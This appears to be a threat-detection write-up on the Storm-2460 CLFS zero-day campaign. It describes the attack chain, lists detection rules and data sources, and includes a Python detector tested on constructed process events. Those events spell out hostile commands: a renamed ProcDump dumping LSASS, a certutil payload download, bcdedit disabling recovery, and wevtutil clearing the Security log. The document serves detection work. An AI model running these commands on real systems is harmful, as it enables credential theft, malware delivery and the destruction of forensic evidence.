Analytics Story: Storm-2460 CLFS Zero Day Exploitation

Description

This analytic story focuses on the exploitation of a Common Log File System (CLFS) driver vulnerability by the Storm-2460 threat actor. The attack chain involves initial access through a zero-day vulnerability in the Windows CLFS driver, followed by the deployment of PipeMagic malware. The threat actor then leverages various living-off-the-land techniques, including the abuse of MSBuild, CertUtil, and ProcDump, to maintain persistence and exfiltrate data. The attack culminates in ransomware deployment, with the actor taking steps to disable system recovery and clear logs to hinder incident response.

Why it matters

Storm-2460, a sophisticated threat actor, has been observed exploiting a zero-day vulnerability in the Windows Common Log File System (CLFS) driver. The attack begins with the exploitation of the CLFS driver vulnerability, which allows the threat actor to gain initial access to the target system. Following successful exploitation, the actor deploys PipeMagic malware, a custom tool designed to facilitate further system access and control.

Once established on the system, Storm-2460 employs various living-off-the-land techniques to maintain persistence and evade detection. The threat actor frequently uses MSBuild.exe, often renamed or spawned by script processes, to execute malicious code. They also leverage CertUtil.exe for various purposes, including downloading additional payloads and extracting certificates. In their credential theft operations, they utilize ProcDump renamed as dllhost.exe to dump LSASS memory. To cover their tracks, they disable system recovery options through bcdedit and wbadmin commands, while using wevtutil to clear event logs and remove evidence of their activities.

The attack chain demonstrates a high level of sophistication, with the threat actor carefully selecting legitimate Windows tools and utilities to carry out their objectives while minimizing the risk of detection. The use of renamed tools and script-based execution methods helps them blend in with normal system activity, making detection more challenging for security teams.

The final stage of the attack involves the deployment of ransomware, with the threat actor taking specific steps to ensure their encryption activities cannot be easily reversed. They systematically disable Windows recovery options and delete system backups and shadow copies to prevent system restoration. To further hinder incident response and forensic investigation, they clear logs and use legitimate tools in ways that appear normal to security systems. This comprehensive approach to persistence and anti-forensics makes the attack particularly challenging to detect and remediate.

This analytic story provides comprehensive detection coverage for the various stages of the Storm-2460 attack chain, from initial exploitation through ransomware deployment. The included detections focus on identifying the abuse of legitimate tools and unusual system modifications that may indicate the presence of this threat actor. By monitoring for these specific behaviors and tool abuses, security teams can better detect and respond to this sophisticated threat.
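To make the tool-abuse behaviours described above concrete, the following is an added Python example (not part of this analytic story or its Splunk searches) that runs simplified versions of those checks over constructed process-creation records shaped like Sysmon EventID 1 / Security 4688 telemetry. The field names follow Sysmon, and the command lines, paths and rule names are assumptions for illustration only.

```python
from typing import Dict, List
# Process-creation records shaped like Sysmon EventID 1 / Security 4688, with Sysmon field
# names (Image, OriginalFileName, CommandLine, ParentImage). All values here are constructed.
Event = Dict[str, str]
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}

def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()   # lower-cased file name component

def classify(e: Event) -> List[str]:
    """Names of the story's behaviours this one event matches (empty list if none)."""
    img, parent = _base(e["Image"]), _base(e.get("ParentImage", ""))
    orig, cmd = e.get("OriginalFileName", "").lower(), e["CommandLine"].lower()
    flags = {t.lstrip("-/") for t in cmd.split()}   # "-urlcache" / "/set" -> "urlcache" / "set"
    hits = []
    # ProcDump's PE name survives a rename on disk (the story cites dllhost.exe); target is lsass
    if orig.startswith("procdump") and img != "procdump.exe" and "lsass" in cmd:
        hits.append("Dump LSASS via renamed ProcDump")
    # MSBuild: binary renamed on disk, or genuine msbuild.exe started by a script host
    if orig == "msbuild.exe" and img != "msbuild.exe":
        hits.append("Suspicious MSBuild Rename")
    if img == "msbuild.exe" and parent in SCRIPT_HOSTS:
        hits.append("MSBuild Spawned By Script Process")
    # certutil used as a downloader: urlcache/verifyctl combined with split
    if img == "certutil.exe" and "split" in flags and flags & {"urlcache", "verifyctl"}:
        hits.append("CertUtil Download With Split Arguments")
    # recovery inhibition and event log clearing
    if img == "bcdedit.exe" and ("recoveryenabled no" in cmd or "ignoreallfailures" in cmd):
        hits.append("BCDEdit Failure Recovery Modification")
    if img == "wevtutil.exe" and flags & {"cl", "clear-log"}:
        hits.append("Suspicious wevtutil Usage")
    return hits

def scan(events: List[Event]) -> Dict[int, List[str]]:
    # event index -> matched behaviours, only for events that matched at least one rule
    return {i: h for i, e in enumerate(events) if (h := classify(e))}

SAMPLE_EVENTS: List[Event] = [  # constructed telemetry, not real captures
    {"Image": r"C:\Windows\Temp\dllhost.exe", "OriginalFileName": "procdump",
     "CommandLine": r"dllhost.exe -accepteula -ma lsass.exe C:\Windows\Temp\l.dmp",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "OriginalFileName": "MSBuild.exe", "CommandLine": r"msbuild.exe C:\Users\Public\t.xml",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -urlcache -split -f http://example.invalid/p.bin p.bin"},
    {"Image": r"C:\Windows\System32\bcdedit.exe", "OriginalFileName": "bcdedit.exe",
     "CommandLine": "bcdedit /set {default} recoveryenabled No"},
    {"Image": r"C:\Windows\System32\wevtutil.exe", "OriginalFileName": "wevtutil.exe",
     "CommandLine": "wevtutil cl Security"},
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs", "ParentImage": r"C:\Windows\System32\services.exe"},
]
```

Running `scan(SAMPLE_EVENTS)` flags the first five records and leaves the benign svchost record unmatched; the renamed-ProcDump rule keys on the PE's original file name rather than the on-disk name, which is the point of the rename-focused detections in the table below.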

Detections

| Name | Technique | Type |
| --- | --- | --- |
| BCDEdit Failure Recovery Modification | Inhibit System Recovery | TTP |
| CertUtil Download With URLCache and Split Arguments | Ingress Tool Transfer | TTP |
| CertUtil Download With VerifyCtl and Split Arguments | Ingress Tool Transfer | TTP |
| Certutil exe certificate extraction | None | TTP |
| CertUtil With Decode Argument | Deobfuscate/Decode Files or Information | TTP |
| Deleting Shadow Copies | Inhibit System Recovery | TTP |
| DLLHost with no Command Line Arguments with Network | Process Injection | TTP |
| Dump LSASS via procdump | LSASS Memory | TTP |
| MSBuild Suspicious Spawned By Script Process | MSBuild | TTP |
| Suspicious msbuild path | Rename Legitimate Utilities, MSBuild | TTP |
| Suspicious MSBuild Rename | Rename Legitimate Utilities, MSBuild | Hunting |
| Suspicious MSBuild Spawn | MSBuild | TTP |
| Suspicious wevtutil Usage | Clear Windows Event Logs | TTP |
| WBAdmin Delete System Backups | Inhibit System Recovery | TTP |
| Windows CertUtil Download With URL Argument | Ingress Tool Transfer | TTP |
| Windows SQL Spawning CertUtil | Ingress Tool Transfer | TTP |
| Windows Steal Authentication Certificates CertUtil Backup | Steal or Forge Authentication Certificates | Anomaly |

Data Sources

| Name | Platform | Sourcetype | Source |
| --- | --- | --- | --- |
| CrowdStrike ProcessRollup2 | N/A | crowdstrike:events:sensor | crowdstrike |
| Sysmon EventID 1 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
| Sysmon EventID 3 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
| Windows Event Log Security 4688 | Windows | xmlwineventlog | XmlWinEventLog:Security |

Source: GitHub | Version: 1